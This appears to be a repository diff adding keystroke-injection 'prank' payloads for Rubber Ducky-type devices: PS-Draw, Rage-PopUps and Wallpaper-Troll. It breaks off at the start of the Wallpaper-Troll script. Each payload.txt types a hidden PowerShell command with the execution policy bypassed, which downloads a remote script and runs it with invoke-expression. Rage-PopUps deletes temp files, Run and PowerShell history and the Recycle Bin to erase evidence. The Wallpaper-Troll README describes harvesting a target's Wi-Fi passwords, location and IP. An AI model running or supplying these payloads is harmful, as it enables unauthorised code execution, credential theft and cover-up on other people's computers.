#__________________________________|_________________________________________________________________________# | | ) ~ ( #
# # / \ / ~ \ #
# github.com/I-Am-Jakoby # \ / \~ ~/ #
# twitter.com/I_Am_Jakoby # /\_/\_/\__ _/_/\_/\__~__/_/\_/\_/\_/\_/\_#
# instagram.com/i_am_jakoby # | | | | ) ) | | | (( | | | | | |#
# youtube.com/c/IamJakoby # | | | |( ( | | | \\ | | | | | |#
############################################################################################################################################################
<#
.NOTES
This script uses the provided arrays to generate images. You also have the ability to make your own if you so choose.
To increase the size of the pixels add more spaces to the following Write-Host command.
Write-Host " " -NoNewline -BackgroundColor $Colors[$position]
.DESCRIPTION
This program will take the provided arrays and use them to generate images that will be drawn out in a powershell window.
.SYNTAX
$col | PS-Draw
$hak5 | PS-Draw
$omg | PS-Draw
PS-Draw -Image $col
PS-Draw -Image $hak5
PS-Draw -Image $omg
#>
############################################################################################################################################################
$Colors = @{
1 = 'White'
2 = 'Black'
3 = 'DarkBlue'
4 = 'DarkGreen'
5 = 'DarkCyan'
6 = 'DarkRed'
7 = 'DarkMagenta'
8 = 'DarkYellow'
9 = 'Gray'
10 = 'DarkGray'
11 = 'Blue'
12 = 'Green'
13 = 'Cyan'
14 = 'Red'
15 = 'Magenta'
16 = 'Yellow'
}
#Show available colors
$col = @(1,1,1,1,1,1,1,1,1,1,1,1,1,1,1,1,1,1,1,1,1,1),
@(2,2,2,2,2,2,2,2,2,2,2,2,2,2,2,2,2,2,2,2,2,2),
@(3,3,3,3,3,3,3,3,3,3,3,3,3,3,3,3,3,3,3,3,3,3),
@(4,4,4,4,4,4,4,4,4,4,4,4,4,4,4,4,4,4,4,4,4,4),
@(5,5,5,5,5,5,5,5,5,5,5,5,5,5,5,5,5,5,5,5,5,5),
@(6,6,6,6,6,6,6,6,6,6,6,6,6,6,6,6,6,6,6,6,6,6),
@(7,7,7,7,7,7,7,7,7,7,7,7,7,7,7,7,7,7,7,7,7,7),
@(8,8,8,8,8,8,8,8,8,8,8,8,8,8,8,8,8,8,8,8,8,8),
@(9,9,9,9,9,9,9,9,9,9,9,9,9,9,9,9,9,9,9,9,9,9),
@(10,10,10,10,10,10,10,10,10,10,10,10,10,10,10,10,10,10,10,10,10,10),
@(11,11,11,11,11,11,11,11,11,11,11,11,11,11,11,11,11,11,11,11,11,11),
@(12,12,12,12,12,12,12,12,12,12,12,12,12,12,12,12,12,12,12,12,12,12),
@(13,13,13,13,13,13,13,13,13,13,13,13,13,13,13,13,13,13,13,13,13,13),
@(14,14,14,14,14,14,14,14,14,14,14,14,14,14,14,14,14,14,14,14,14,14),
@(15,15,15,15,15,15,15,15,15,15,15,15,15,15,15,15,15,15,15,15,15,15),
@(16,16,16,16,16,16,16,16,16,16,16,16,16,16,16,16,16,16,16,16,16,16)
$omg = @(2,2,1,1,1,1,2,2,2,2,2,2,2,2,2,2,2,2,1,1,1,1),
@(2,2,2,1,1,1,1,2,2,2,2,2,2,2,2,2,2,1,1,1,1,2),
@(2,2,2,2,2,1,1,1,2,2,2,2,2,2,2,2,1,1,1,2,2,2),
@(2,2,2,2,2,1,1,1,2,2,2,2,2,2,2,2,1,1,1,2,2,2),
@(2,2,2,2,2,1,1,1,2,2,2,2,2,2,2,2,1,1,1,2,2,2),
@(2,2,2,2,1,1,1,1,2,2,2,2,2,2,2,2,1,1,1,1,2,2),
@(2,2,2,1,1,1,1,2,2,2,2,2,2,2,2,2,2,1,1,1,1,2),
@(2,2,1,1,1,1,2,2,2,2,2,2,2,2,2,2,2,2,1,1,1,1),
@(2,2,1,1,1,1,2,2,2,2,2,2,2,2,2,2,2,2,1,1,1,1),
@(2,2,1,1,1,1,2,2,2,1,1,1,1,1,1,2,2,2,1,1,1,1),
@(2,2,1,1,1,1,1,1,1,1,1,1,1,1,1,1,1,1,1,1,1,1),
@(2,2,1,1,1,1,1,1,1,1,1,1,1,1,1,1,1,1,1,1,1,1),
@(2,2,2,1,1,1,1,1,1,1,1,1,1,1,1,1,1,1,1,1,1,2),
@(2,2,2,2,1,1,1,1,1,1,2,2,2,2,1,1,1,1,1,1,2,2),
@(2,2,2,2,1,1,1,1,1,2,2,2,2,2,2,1,1,1,1,1,2,2),
@(2,2,2,2,1,1,1,1,2,2,2,2,2,2,2,2,1,1,1,1,2,2),
@(2,2,2,2,1,1,1,1,2,2,2,2,2,2,2,2,1,1,1,1,2,2),
@(2,2,2,2,1,1,1,1,2,2,2,2,2,2,2,2,1,1,1,1,2,2),
@(2,2,2,2,1,1,1,1,2,2,2,2,2,2,2,2,1,1,1,1,2,2),
@(2,2,2,2,1,1,1,1,1,2,2,2,2,2,2,1,1,1,1,1,2,2),
@(2,2,2,2,1,1,1,1,1,1,2,2,2,2,1,1,1,1,1,1,2,2),
@(2,2,2,2,1,1,1,1,1,1,1,1,1,1,1,1,1,1,1,1,2,2),
@(2,2,2,2,2,1,1,1,1,1,1,1,1,1,1,1,1,1,1,2,2,2),
@(2,2,2,2,2,2,1,1,1,1,1,1,1,1,1,1,1,1,2,2,2,2),
@(2,2,2,2,2,2,2,2,2,1,1,1,1,1,1,2,2,2,2,2,2,2)
$hak5 = @(1,1,1,1,1,1,1,1,1,1,1,1,1,1,1,1,1,1,1,1,1,1,1,1,1,1,1,1,1,1,1,1,1,1,1,1,1,1,1,1,1,1,1),
@(1,1,1,1,1,1,1,1,1,1,1,1,1,1,1,1,1,1,1,1,1,1,1,1,1,1,1,1,1,1,1,1,1,1,1,1,1,1,1,1,1,1,1),
@(1,1,1,1,1,1,1,1,1,1,1,1,1,1,1,1,1,1,1,1,1,1,1,1,1,1,1,1,1,1,1,1,1,1,1,1,1,1,1,1,1,1,1),
@(1,1,1,1,1,1,1,1,1,1,1,1,1,1,1,1,1,1,1,1,1,1,1,1,1,1,1,1,1,1,1,1,1,6,6,6,6,6,6,6,6,6,1),
@(1,1,1,1,1,1,1,1,1,1,1,1,1,1,1,1,1,1,1,1,1,1,1,1,1,1,1,1,1,1,1,1,6,6,6,6,6,6,6,6,6,6,1),
@(1,1,1,1,1,1,1,1,1,1,1,2,2,1,1,1,1,1,1,1,1,1,1,1,1,1,1,1,1,1,1,1,6,6,6,6,1,1,1,1,1,1,1),
@(1,2,2,1,1,1,1,1,1,1,1,2,2,1,1,1,1,1,1,1,1,1,1,1,1,1,1,1,1,1,1,1,6,6,6,6,1,1,1,1,1,1,1),
@(1,2,2,1,1,1,1,1,1,1,1,2,2,1,1,1,1,1,1,1,1,1,1,1,1,1,1,1,2,2,2,6,6,6,6,6,6,6,6,6,6,6,1),
@(1,2,2,1,1,1,1,1,1,1,1,2,2,1,1,1,1,2,2,2,1,1,1,2,2,1,1,1,2,2,1,6,6,6,6,6,6,6,6,6,6,6,1),
@(1,2,2,1,1,1,1,1,1,1,1,2,2,1,1,1,1,2,2,2,1,1,1,2,2,1,1,2,2,1,1,6,6,6,6,1,1,1,6,6,6,6,1),
@(1,2,2,1,1,1,1,1,1,1,1,2,2,1,1,1,2,2,2,2,1,1,1,2,2,2,2,2,1,1,1,6,6,6,1,1,1,1,6,6,6,6,1),
@(1,2,2,2,2,2,2,2,2,2,2,2,2,1,1,1,2,1,1,2,2,1,1,2,2,2,2,2,1,1,1,1,1,1,1,1,1,6,6,6,6,6,1),
@(1,2,2,2,2,2,2,2,2,2,2,2,2,1,1,2,2,1,1,2,2,1,1,2,2,1,1,2,2,1,1,1,1,1,1,1,1,6,6,6,6,6,1),
@(1,2,2,1,1,1,1,1,1,1,1,2,2,1,1,2,2,1,1,2,2,1,1,2,2,1,1,2,2,1,1,1,1,1,1,1,1,6,6,6,6,6,1),
@(1,2,2,1,1,1,1,1,1,1,1,2,2,1,1,2,2,2,2,2,2,2,1,2,2,1,1,1,2,6,6,6,6,6,1,1,6,6,6,6,6,1,1),
@(1,2,2,1,1,1,1,1,1,1,1,2,2,1,1,2,2,2,2,2,2,2,1,2,2,1,1,1,1,6,6,6,6,6,1,1,6,6,6,6,6,1,1),
@(1,2,2,1,1,1,1,1,1,1,1,2,2,2,2,2,1,1,1,1,2,2,2,2,2,1,1,1,1,6,6,6,6,6,1,1,6,6,6,6,1,1,1),
@(1,2,2,1,1,1,1,1,1,1,1,2,2,2,2,1,1,1,1,1,1,1,1,1,1,1,1,1,1,6,6,6,6,6,6,6,6,6,6,6,1,1,1),
@(1,2,2,1,1,1,1,1,1,1,1,1,1,1,1,1,1,1,1,1,1,1,1,1,1,1,1,1,1,6,6,6,6,6,6,6,6,6,6,1,1,1,1),
@(1,1,1,1,1,1,1,1,1,1,1,1,1,1,1,1,1,1,1,1,1,1,1,1,1,1,1,1,1,6,6,6,6,6,6,6,1,1,1,1,1,1,1),
@(1,1,1,1,1,1,1,1,1,1,1,1,1,1,1,1,1,1,1,1,1,1,1,1,1,1,1,1,1,1,1,1,1,1,1,1,1,1,1,1,1,1,1)
# -------------------------------------------------------------------------------------------
function PS-Draw {
[CmdletBinding()]
param (
[Parameter (Mandatory = $True, ValueFromPipeline = $True)]
[Alias("I")]
[object[]]$Image
)
# if the data is sent through the pipeline, use $input to collect is as array
if ($PSCmdlet.MyInvocation.ExpectingInput) { $Image = @($input) }
#$Data | Out-String -Stream -Width 9999 | ForEach-Object { "$($_.Trim())`r`n" }
cls
foreach ($row in $Image) {
foreach ($position in $row) {
Write-Host " " -NoNewline -BackgroundColor $Colors[$position]
Start-Sleep -m 10
}
Write-Host ""
}
}
<#
.NOTES
This will get either the targets full name associated with the registered microsoft account
or it will default to grabbing the username of the account to use as a greeting for this script
#>
function Get-fullName {
try {
$fullName = Net User $Env:username | Select-String -Pattern "Full Name";$fullName = ("$fullName").TrimStart("Full Name")
}
# If no name is detected function will return $env:UserName
# Write Error is just for troubleshooting
catch {Write-Error "No name was detected"
return $env:UserName
-ErrorAction SilentlyContinue
}
return $fullName
}
# -------------------------------------------------------------------------------------------
# Get name to be used in greeting
cls
$fullName = Get-fullName
echo "Hello $fullName"
# -------------------------------------------------------------------------------------------
<#
.NOTES
Then the script will be paused until the mouse is moved
script will check mouse position every indicated number of seconds
This while loop will constantly check if the mouse has been moved
"CAPSLOCK" will be continously pressed to prevent screen from turning off
it will then sleep for the indicated number of seconds and check again
when mouse is moved it will break out of the loop and continue theipt
#>
Add-Type -AssemblyName System.Windows.Forms
$o=New-Object -ComObject WScript.Shell
$originalPOS = [System.Windows.Forms.Cursor]::Position.X
while (1) {
$pauseTime = 3
if ([Windows.Forms.Cursor]::Position.X -ne $originalPOS){
break
}
else {
$o.SendKeys("{CAPSLOCK}");Start-Sleep -Seconds $pauseTime
}
}
<#
.NOTES
This is where you call the function to draw out one of the images above
$col - to see the available colors you can use for a custom image
$hak5 - this will draw out the hak5 five logo
$omg - this will draw out the omg logo
#>
# -------------------------------------------------------------------------------------------
# Call function with one of the arrays listed above to generate an image
$hak5 | PS-Draw

201
payloads/library/prank/-RD-PS-Draw/PS-Draw.ps1 Normal file
View File

@ -0,0 +1,201 @@
############################################################################################################################################################
# | ___ _ _ _ # ,d88b.d88b #
# Title : PS-Draw | |_ _| __ _ _ __ ___ | | __ _ | | __ ___ | |__ _ _ # 88888888888 #
# Author : I am Jakoby | | | / _` | | '_ ` _ \ _ | | / _` | | |/ / / _ \ | '_ \ | | | |# `Y8888888Y' #
# Version : 1.0 | | | | (_| | | | | | | | | |_| | | (_| | | < | (_) | | |_) | | |_| |# `Y888Y' #
# Category : Prank | |___| \__,_| |_| |_| |_| \___/ \__,_| |_|\_\ \___/ |_.__/ \__, |# `Y' #
# Target : Windows 7,10,11 | |___/ # /\/|_ __/\\ #
# Mode : HID | |\__/,| (`\ # / -\ /- ~\ #
# | My crime is that of curiosity |_ _ |.--.) )# \ = Y =T_ = / #
# | and yea curiosity killed the cat ( T ) / # Luther )==*(` `) ~ \ Hobo #
# | but satisfaction brought him back (((^_(((/(((_/ # / \ / \ #
#__________________________________|_________________________________________________________________________# | | ) ~ ( #
# # / \ / ~ \ #
# github.com/I-Am-Jakoby # \ / \~ ~/ #
# twitter.com/I_Am_Jakoby # /\_/\_/\__ _/_/\_/\__~__/_/\_/\_/\_/\_/\_#
# instagram.com/i_am_jakoby # | | | | ) ) | | | (( | | | | | |#
# youtube.com/c/IamJakoby # | | | |( ( | | | \\ | | | | | |#
############################################################################################################################################################
<#
.NOTES
This script will convert an approximation of what your image should look like. Most likely you'll need to test several images to find one that works
well. It is best to use images no larger than 150x150 pixels, but I would even recommend going smaller than that. My exmaple image is 25x20 pixels
To increase the size of the pixels add more spaces to the following Write-Host command.
Write-Host " " -NoNewline -BackgroundColor $BackGround
.DESCRIPTION
This program will take the path of an image you provide and convert it to a Bitmap file. An algorithm will be used to calculate the closest console color
that can be used in powershell. Finally that image will be drawn in a powershell window.
.SYNTAX
"$env:TMP\omg-ico.png" | PS-Draw
PS-Draw -Path "$env:TMP\omg-ico.png"
#>
############################################################################################################################################################
Function PS-Draw
{
param(
[String] [parameter(mandatory=$true, Valuefrompipeline = $true)] $Path,
[Switch] $ToASCII
)
Begin
{
[void] [System.Reflection.Assembly]::LoadWithPartialName('System.drawing')
# Console Colors and their Hexadecimal values
$Colors = @{
'FFFFFFFF' = 'White'
'FF000000' = 'Black'
'FF000080' = 'DarkBlue'
'FF008000' = 'DarkGreen'
'FF008080' = 'DarkCyan'
'FF800000' = 'DarkRed'
'FF800080' = 'DarkMagenta'
'FF808000' = 'DarkYellow'
'FFC0C0C0' = 'Gray'
'FF808080' = 'DarkGray'
'FF0000FF' = 'Blue'
'FF00FF00' = 'Green'
'FF00FFFF' = 'Cyan'
'FFFF0000' = 'Red'
'FFFF00FF' = 'Magenta'
'FFFFFF00' = 'Yellow'
}
# Algorithm to calculate closest Console color (Only 16) to a color of Pixel
Function Get-ClosestConsoleColor($PixelColor)
{
($(foreach ($item in $Colors.Keys) {
[pscustomobject]@{
'Color' = $Item
'Diff' = [math]::abs([convert]::ToInt32($Item,16) - [convert]::ToInt32($PixelColor,16))
}
}) | Sort-Object Diff)[0].color
}
}
Process
{
Foreach($item in $Path)
{
#Convert Image to BitMap
$BitMap = [System.Drawing.Bitmap]::FromFile((Get-Item $Item).fullname)
Foreach($y in (1..($BitMap.Height-1)))
{
Foreach($x in (1..($BitMap.Width-1)))
{
$Pixel = $BitMap.GetPixel($X,$Y)
$BackGround = $Colors.Item((Get-ClosestConsoleColor $Pixel.name))
If($ToASCII) # Condition to check ToASCII switch
{
Write-Host "$([Char](Get-Random -Maximum 126 -Minimum 33))" -NoNewline -ForegroundColor $BackGround
}
else
{
Write-Host " " -NoNewline -BackgroundColor $BackGround
}
}
Write-Host '' # Blank write-host to Start the next row
}
}
}
end
{
}
}
<#
.NOTES
This will get either the targets full name associated with the registered microsoft account
or it will default to grabbing the username of the account to use as a greeting for this script
#>
function Get-fullName {
try {
$fullName = Net User $Env:username | Select-String -Pattern "Full Name";$fullName = ("$fullName").TrimStart("Full Name")
}
# If no name is detected function will return $env:UserName
# Write Error is just for troubleshooting
catch {Write-Error "No name was detected"
return $env:UserName
-ErrorAction SilentlyContinue
}
return $fullName
}
# -------------------------------------------------------------------------------------------
# Download the image from wherever you are hosting it
iwr https://www.dropbox.com/s/EXAMPLE/omg-ico.png?dl=1 -O $env:TMP\omg-ico.png
# -------------------------------------------------------------------------------------------
# Get name to use in the greeting
cls
$fullName = Get-fullName
echo "Hello $fullName"
# -------------------------------------------------------------------------------------------
<#
.NOTES
Then the script will be paused until the mouse is moved
script will check mouse position every indicated number of seconds
This while loop will constantly check if the mouse has been moved
"CAPSLOCK" will be continously pressed to prevent screen from turning off
it will then sleep for the indicated number of seconds and check again
when mouse is moved it will break out of the loop and continue theipt
#>
Add-Type -AssemblyName System.Windows.Forms
$o=New-Object -ComObject WScript.Shell
$originalPOS = [System.Windows.Forms.Cursor]::Position.X
while (1) {
$pauseTime = 3
if ([Windows.Forms.Cursor]::Position.X -ne $originalPOS){
break
}
else {
$o.SendKeys("{CAPSLOCK}");Start-Sleep -Seconds $pauseTime
}
}
<#
.NOTES
This is where you call the function to draw out your image
Replace the path below with the path of your image
.SYNTAX
"$env:TMP\omg-ico.png" | PS-Draw
PS-Draw -Path "$env:TMP\omg-ico.png"
#>
# -------------------------------------------------------------------------------------------
# Call the function with the image you'd like to have drawn here
"$env:TMP\omg-ico.png" | PS-Draw

132
payloads/library/prank/-RD-PS-Draw/README.md Normal file
View File

@ -0,0 +1,132 @@
![Logo](https://github.com/I-Am-Jakoby/hak5-submissions/blob/main/Assets/logo-170-px.png?raw=true)
<!-- TABLE OF CONTENTS -->
<details>
<summary>Table of Contents</summary>
<ol>
<li><a href="#Description">Description</a></li>
<li><a href="#getting-started">Getting Started</a></li>
<li><a href="#Contributing">Contributing</a></li>
<li><a href="#Version-History">Version History</a></li>
<li><a href="#Contact">Contact</a></li>
<li><a href="#Acknowledgments">Acknowledgments</a></li>
</ol>
</details>
# PS-Draw
A script used to generate and draw images in the Powershell Window, used to leave a signature or perhaps taunt victims
## Description
These two programs use two different method to draw out images in the Powershell Window.
PS-Draw will convert an image you download into a BMP file estiamte the used colors based off the 16 available powershell colors
then draw your image out in the powershell window. This process is not exact and needed testing of multiple images to find one that works well.
PS-Custom-Draw generates images to be drawn in the Powershell Window based off pre-configured arrays I put together already included in the file itself.
These images look significantly cleaner due to the fact they were drawn and coded specifically for this purpose.
After the images are generated, a greeting will be generated by grabbing either the name associated with the registered microsoft account or the
UserName environment variable.
The script will then be paused until a mouse movement is detected at which time the pre selected image will be drawn out in the powershell window.
## Getting Started
### Dependencies
* DropBox or another image hosting service - Your Shared link for the intended file
* Windows 10,11
<p align="right">(<a href="#top">back to top</a>)</p>
### Executing program
* Plug in your Device
* Invoke-WebRequest will be used to download the image
```
powershell -w h -NoP -NonI -Exec Bypass $pl = iwr https:// < Your Shared link for the intended file> ?dl=1
```
* The image will be converted into a BMP file
* An algorithm will be used to find the closest matching colors available in the powershell window
* The image will be generated in the powershell window
This is an example of an image I used with the PS-Draw command
![alt text](https://github.com/I-Am-Jakoby/hak5-submissions/blob/main/OMG/Payloads/OMG-PS-Draw/Images/omg-ico.png?raw=true)
This is how the iamge is interpreted and drawn out
![alt text](https://github.com/I-Am-Jakoby/hak5-submissions/blob/main/OMG/Payloads/OMG-PS-Draw/Images/PS-Draw.jpg?raw=true)
* The PS-Custom-Draw operates a little differently
* One of the preconfigured arrays is piped into the command to generate an image
* "$col | PS-Draw" - This first one will show the available colors to be used as seen below
![alt text](https://github.com/I-Am-Jakoby/hak5-submissions/blob/main/OMG/Payloads/OMG-PS-Draw/Images/ps-colors.jpg?raw=true)
* "$omg | PS-Draw" - This will draw out the OMG logo as seen below
![alt text](https://github.com/I-Am-Jakoby/hak5-submissions/blob/main/OMG/Payloads/OMG-PS-Draw/Images/ps-omg.jpg?raw=true)
* "$hak5 | PS-Draw" - This will draw out the Hak5 logo as seen below
![alt text](https://github.com/I-Am-Jakoby/hak5-submissions/blob/main/OMG/Payloads/OMG-PS-Draw/Images/ps-hak5.jpg?raw=true)
<p align="right">(<a href="#top">back to top</a>)</p>
## Contributing
All contributors names will be listed here
I am Jakoby
<p align="right">(<a href="#top">back to top</a>)</p>
## Version History
* 0.1
* Initial Release
<p align="right">(<a href="#top">back to top</a>)</p>
<!-- CONTACT -->
## Contact
<div><h2>I am Jakoby</h2></div>
<p><br/>
<img src="https://media.giphy.com/media/VgCDAzcKvsR6OM0uWg/giphy.gif" width="50">
<a href="https://github.com/I-Am-Jakoby/">
<img src="https://img.shields.io/badge/GitHub-I--Am--Jakoby-blue">
</a>
<a href="https://www.instagram.com/i_am_jakoby/">
<img src="https://img.shields.io/badge/Instagram-i__am__jakoby-red">
</a>
<a href="https://twitter.com/I_Am_Jakoby/">
<img src="https://img.shields.io/badge/Twitter-I__Am__Jakoby-blue">
</a>
<a href="https://www.youtube.com/c/IamJakoby/">
<img src="https://img.shields.io/badge/YouTube-I_am_Jakoby-red">
</a>
Project Link: [https://github.com/I-Am-Jakoby/hak5-submissions/tree/main/RubberDucky/Payloads/RD-PS-Draw)
</p>
<p align="right">(<a href="#top">back to top</a>)</p>
<!-- ACKNOWLEDGMENTS -->
## Acknowledgments
* [Hak5](https://hak5.org/)
* [MG](https://github.com/OMG-MG)
<p align="right">(<a href="#top">back to top</a>)</p>

17
payloads/library/prank/-RD-PS-Draw/payload.txt Normal file
View File

@ -0,0 +1,17 @@
REM Title: PS-Draw
REM Author: I am Jakoby
REM Description: This payload is meant to draw images in your targets powershell console. See PS-Draw.ps1 for more details
REM Target: Windows 10, 11
REM Remember to replace the link with your link for the intended file to download
REM Also remember to replace ?dl=0 with ?dl=1 at the end of your link so it is executed properly
REM Download one of the two PS-Draw Execute files provided and execute it
GUI r
DELAY 500
STRING powershell -w h -NoP -NonI -Exec Bypass $pl = iwr https:// < Your Shared link for the intended file> ?dl=1; invoke-expression $pl
ENTER

22
payloads/library/general/RD-PineApple/README.md → payloads/library/prank/-RD-Rage-PopUps/README.md
View File

@ -1,4 +1,4 @@
![Logo](https://github.com/I-Am-Jakoby/hak5-submissions/blob/main/OMG-AcidBurn/logo-170-px.png?raw=true)
![Logo](https://github.com/I-Am-Jakoby/hak5-submissions/blob/main/Assets/logo-170-px.png?raw=true)
<!-- TABLE OF CONTENTS -->
<details>
@ -13,33 +13,28 @@
</ol>
</details>
# RD-PineApple
# Rage-PopUps
A script used to connect a targets PC to your wifi PineApple using the Rubber Ducky
A script I put together to torment Call Center Scammers but can be used on your friends as well.. or Foes.
## Description
This program will use the Rubber Ducky to connect target pc to your Wifi PineApples wireless access point
It will generate an XML file that will be used to create a network profile for your Wifi PineApple.
Depending on your method of execution the XML file will either be manually entered into a powershell window
or you may use and Invoke Web-Request to download a script to add the network profile. After either the history of
the powershell window and run box will be erased for a clean exit.
This program will open a series of pop up boxes with insults in a loop that repeats as many times as you set it to.
There is a section in the Rage-PopUps.ps1 file where you insert your own insults or use the ones provided
## Getting Started
### Dependencies
* DropBox or another File Hosting service - Your Shared link for the intended file
* DropBox or other file hosting service - Your Shared link for the intended file
* Windows 10,11
<p align="right">(<a href="#top">back to top</a>)</p>
### Executing program
* Plug in RubberDucky
* Either the entire script will be manually entered into the powershell window or
* Plug in your device
* Invoke-WebRequest will be entered in the Run Box to download and execute the script from memory
* PS1 file to download is provided above
```
powershell -w h -NoP -NonI -Exec Bypass $pl = iwr https:// < Your Shared link for the intended file> ?dl=1; invoke-expression $pl
```
@ -85,7 +80,7 @@ I am Jakoby
<img src="https://img.shields.io/badge/YouTube-I_am_Jakoby-red">
</a>
Project Link: [https://github.com/I-Am-Jakoby/hak5-submissions/tree/main/RD-PineApple)
Project Link: [https://github.com/I-Am-Jakoby/hak5-submissions/tree/main/RubberDucky/Payloads/RD-Rage-PopUps)
</p>
@ -99,5 +94,4 @@ I am Jakoby
* [MG](https://github.com/OMG-MG)
<p align="right">(<a href="#top">back to top</a>)</p>

75
payloads/library/prank/-RD-Rage-PopUps/Rage-PopUps.ps1 Normal file
View File

@ -0,0 +1,75 @@
############################################################################################################################################################
# | ___ _ _ _ # ,d88b.d88b #
# Title : Rage-PopUps | |_ _| __ _ _ __ ___ | | __ _ | | __ ___ | |__ _ _ # 88888888888 #
# Author : I am Jakoby | | | / _` | | '_ ` _ \ _ | | / _` | | |/ / / _ \ | '_ \ | | | |# `Y8888888Y' #
# Version : 1.0 | | | | (_| | | | | | | | | |_| | | (_| | | < | (_) | | |_) | | |_| |# `Y888Y' #
# Category : Prank | |___| \__,_| |_| |_| |_| \___/ \__,_| |_|\_\ \___/ |_.__/ \__, |# `Y' #
# Target : Windows 7,10,11 | |___/ # /\/|_ __/\\ #
# Mode : HID | |\__/,| (`\ # / -\ /- ~\ #
# | My crime is that of curiosity |_ _ |.--.) )# \ = Y =T_ = / #
# | and yea curiosity killed the cat ( T ) / # Luther )==*(` `) ~ \ Hobo #
# | but satisfaction brought him back (((^_(((/(((_/ # / \ / \ #
#__________________________________|_________________________________________________________________________# | | ) ~ ( #
# # / \ / ~ \ #
# github.com/I-Am-Jakoby # \ / \~ ~/ #
# twitter.com/I_Am_Jakoby # /\_/\_/\__ _/_/\_/\__~__/_/\_/\_/\_/\_/\_#
# instagram.com/i_am_jakoby # | | | | ) ) | | | (( | | | | | |#
# youtube.com/c/IamJakoby # | | | |( ( | | | \\ | | | | | |#
############################################################################################################################################################
<#
.SYNOPSIS
This script will open a series of pop ups in order to taunt your target. I wrote it initially to target call center scammers
.DESCRIPTION
This program is to taunt your target. Below are a series insults you can modify as you like. The program will generate a PopUp
for each one of them.
#>
#------------------------------------------------------------------------------------------------------------------------------------
Add-Type -AssemblyName System.Windows.Forms
# The number of times you want it to cycle through your list of questions
$cycles = 3
# List as many questions here as you like, it will cycke through all of them
$msgs = @(
"Are all scammers as dumb as you?"
"Is the pay worth being this big of a loser?"
"Do your parents know what you do for a living?"
"Does you boss know much much you suck at this job?"
)
for ($i=1; $i -le $cycles; $i++) {
Foreach ($msg in $msgs) {
[System.Windows.Forms.MessageBox]::Show($msg , "You're-a-Loser.exe" , 4 , 'Question')
}
}
#----------------------------------------------------------------------------------------------------
<#
.NOTES
This is to clean up behind you and remove any evidence to prove you were there
#>
# Delete contents of Temp folder
rm $env:TEMP\* -r -Force -ErrorAction SilentlyContinue
# Delete run box history
reg delete HKEY_CURRENT_USER\Software\Microsoft\Windows\CurrentVersion\Explorer\RunMRU /va /f
# Delete powershell history
Remove-Item (Get-PSreadlineOption).HistorySavePath
# Deletes contents of recycle bin
Clear-RecycleBin -Force -ErrorAction SilentlyContinue

16
payloads/library/prank/-RD-Rage-PopUps/payload.txt Normal file
View File

@ -0,0 +1,16 @@
REM Title: Rage-PopUps
REM Author: I am Jakoby
REM Description: This payload is meant to make a never ending supply of taunting pop-ups. See Rage-PopUps.ps1 for more details
REM Target: Windows 10, 11
REM Remeber to replace the link with your link for the intended file to download
REM Also remember to replace ?dl=0 with ?dl=1 at the end of your link so it is executed properly
GUI r
DELAY 500
STRING powershell -w h -NoP -NonI -Exec Bypass $pl = iwr https:// < Your Shared link for the intended file> ?dl=1; invoke-expression $pl
DELAY 500
ENTER

99
payloads/library/prank/-RD-Wallpaper-Troll/README.md Normal file
View File

@ -0,0 +1,99 @@
![Logo](https://github.com/I-Am-Jakoby/hak5-submissions/blob/main/Assets/logo-170-px.png?raw=true)
<!-- TABLE OF CONTENTS -->
<details>
<summary>Table of Contents</summary>
<ol>
<li><a href="#Description">Description</a></li>
<li><a href="#getting-started">Getting Started</a></li>
<li><a href="#Contributing">Contributing</a></li>
<li><a href="#Version-History">Version History</a></li>
<li><a href="#Contact">Contact</a></li>
<li><a href="#Acknowledgments">Acknowledgments</a></li>
</ol>
</details>
# Wallpaper-Troll
A script I put together to torment Call Center Scammers but can be used on your friends as well.. or Foes.
## Description
This program enumerates a target PC to get their Name, GeoLocation (Latitude and Longitude), Public IP, Day password was last set, and wifi passwords
This information will be saved to a file that is then converted to a .BMP image
That image will be saved to their desktop and saved as their wallpaper
Opening the image on their desktop with NotePad will reveal the binary code with a hidden message at the bottom of the file
![alt text](https://github.com/I-Am-Jakoby/hak5-submissions/blob/main/RubberDucky/Payloads/RD-Wallpaper-Troll/wp-troll.jpg)
## Getting Started
### Dependencies
* Windows 10,11
<p align="right">(<a href="#top">back to top</a>)</p>
### Executing program
* Plug in your device
* Invoke-WebRequest will be entered in the Run Box to download and execute the script from memory
```
powershell -w h -NoP -NonI -Exec Bypass $pl = iwr https://raw.githubusercontent.com/I-Am-Jakoby/hak5-submissions/main/OMG/Payloads/OMG-Wallpaper-Troll/Wallpaper-Troll.ps1?dl=1?dl=1; invoke-expression $pl
```
<p align="right">(<a href="#top">back to top</a>)</p>
## Contributing
All contributors names will be listed here
I am Jakoby
<p align="right">(<a href="#top">back to top</a>)</p>
## Version History
* 0.1
* Initial Release
<p align="right">(<a href="#top">back to top</a>)</p>
<!-- CONTACT -->
## Contact
<div><h2>I am Jakoby</h2></div>
<p><br/>
<img src="https://media.giphy.com/media/VgCDAzcKvsR6OM0uWg/giphy.gif" width="50">
<a href="https://github.com/I-Am-Jakoby/">
<img src="https://img.shields.io/badge/GitHub-I--Am--Jakoby-blue">
</a>
<a href="https://www.instagram.com/i_am_jakoby/">
<img src="https://img.shields.io/badge/Instagram-i__am__jakoby-red">
</a>
<a href="https://twitter.com/I_Am_Jakoby/">
<img src="https://img.shields.io/badge/Twitter-I__Am__Jakoby-blue">
</a>
<a href="https://www.youtube.com/c/IamJakoby/">
<img src="https://img.shields.io/badge/YouTube-I_am_Jakoby-red">
</a>
Project Link: [https://github.com/I-Am-Jakoby/hak5-submissions/tree/main/RubberDucky/Payloads/RD-Wallpaper-Troll)
</p>
<p align="right">(<a href="#top">back to top</a>)</p>
<!-- ACKNOWLEDGMENTS -->
## Acknowledgments
* [Hak5](https://hak5.org/)
* [MG](https://github.com/OMG-MG)
<p align="right">(<a href="#top">back to top</a>)</p>

412
payloads/library/prank/-RD-Wallpaper-Troll/Wallpaper-Troll.ps1 Normal file
View File

@ -0,0 +1,412 @@
############################################################################################################################################################
# | ___ _ _ _ # ,d88b.d88b #
# Title : Wallpaper-Troll | |_ _| __ _ _ __ ___ | | __ _ | | __ ___ | |__ _ _ # 88888888888 #
# Author : I am Jakoby | | | / _` | | '_ ` _ \ _ | | / _` | | |/ / / _ \ | '_ \ | | | |# `Y8888888Y' #
# Version : 1.0 | | | | (_| | | | | | | | | |_| | | (_| | | < | (_) | | |_) | | |_| |# `Y888Y' #
# Category : Prank | |___| \__,_| |_| |_| |_| \___/ \__,_| |_|\_\ \___/ |_.__/ \__, |# `Y' #
# Target : Windows 10,11 | |___/ # /\/|_ __/\\ #
# Mode : HID | |\__/,| (`\ # / -\ /- ~\ #
